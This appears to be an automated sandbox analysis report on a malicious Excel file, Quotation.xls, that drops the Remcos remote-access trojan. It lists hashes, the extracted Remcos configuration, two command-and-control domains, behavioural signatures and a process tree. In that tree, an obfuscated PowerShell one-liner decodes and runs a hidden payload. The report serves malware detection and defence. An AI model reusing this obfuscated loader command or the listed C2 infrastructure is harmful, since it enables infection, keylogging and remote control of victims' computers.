Analysis

- max time kernel: 149s
- max time network: 134s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 24-07-2024 09:07
Tasks

- Static task: static1
- Behavioral task: behavioral1 (Sample: Quotation.xls, Resource: win7-20240704-en)
- Behavioral task: behavioral2 (Sample: Quotation.xls, Resource: win10v2004-20240709-en)
General

- Target: Quotation.xls
- Size: 1.0MB
- MD5: 7a9a6e2a484c942e9247513bf8420f13
- SHA1: 9a0399a2c75537687cdcaa939adb4a871b56f26e
- SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
- SHA512: a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c
- SSDEEP: 24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu
Malware Config

Extracted family: remcos
C2 (port 2556):
- bossnacarpet.com:2556
- vegetachcnc.com:2556

Configuration values:
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: chrome-6W1HCC
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures

- Blocklisted process makes network request (3 IoCs)
  - flow 8: PID 2628 mshta.exe
  - flow 9: PID 2628 mshta.exe
  - flow 11: PID 884 powershell.exe
- Downloads MZ/PE file
- Evasion via Device Credential Deployment (1 IoC)
  - PID 884 powershell.exe
- Executes dropped EXE (1 IoC)
  - PID 1968 winiti.exe
- Loads dropped DLL (1 IoC)
  - PID 884 powershell.exe
- Drops file in System32 directory (1 IoC)
  - File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- Suspicious use of SetThreadContext (1 IoC)
  - PID 1968 winiti.exe set thread context of 2928 (procid_target 41)
- Detected phishing page
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by each of: powershell.exe, csc.exe, cvtres.exe, AddInProcess32.exe, EXCEL.EXE, mshta.exe, cmd.exe
- Enumerates system info in registry (2 TTPs, 1 IoC)
  - Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor (EXCEL.EXE)
- Modifies Internet Explorer settings (1 IoC)
  - Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  - PID 2848 EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  - PID 884 powershell.exe (3 times)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  - Token: SeDebugPrivilege, PID 884 powershell.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
  - PID 2848 EXCEL.EXE (7 times)
- Suspicious use of WriteProcessMemory (51 IoCs; identical rows collapsed, count in parentheses)
  - PID 2628 mshta.exe wrote to memory of 588 (procid_target 32) (4)
  - PID 588 cmd.exe wrote to memory of 884 (procid_target 34) (4)
  - PID 884 powershell.exe wrote to memory of 1052 (procid_target 35) (4)
  - PID 1052 csc.exe wrote to memory of 1876 (procid_target 36) (4)
  - PID 884 powershell.exe wrote to memory of 1968 (procid_target 37) (4)
  - PID 1968 winiti.exe wrote to memory of 2868 (procid_target 39) (5)
  - PID 1968 winiti.exe wrote to memory of 2864 (procid_target 40) (13)
  - PID 1968 winiti.exe wrote to memory of 2928 (procid_target 41) (13)
Processes

- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 2848)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
  Signatures: System Location Discovery: System Language Discovery; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\mshta.exe (PID 2628)
  Command line: C:\Windows\SysWOW64\mshta.exe -Embedding
  Signatures: Blocklisted process makes network request; System Location Discovery: System Language Discovery; Modifies Internet Explorer settings; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 588)
    Command line: "C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 884)
      Command line: PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
      Signatures: Blocklisted process makes network request; Evasion via Device Credential Deployment; Loads dropped DLL; Drops file in System32 directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 1052)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 1876)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"
          Signatures: System Location Discovery: System Language Discovery
      - C:\Users\Admin\AppData\Roaming\winiti.exe (PID 1968)
        Command line: "C:\Users\Admin\AppData\Roaming\winiti.exe"
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 2868)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe (PID 2864)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PID 2928)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Signatures: System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta
  Filesize: 12KB
  MD5: a183dcd47ab3d4ad39338dfe7eddff53
  SHA1: 4cd5c2dad4510df9516f6d16208bd284add559b5
  SHA256: 85c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682
  SHA512: 8818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791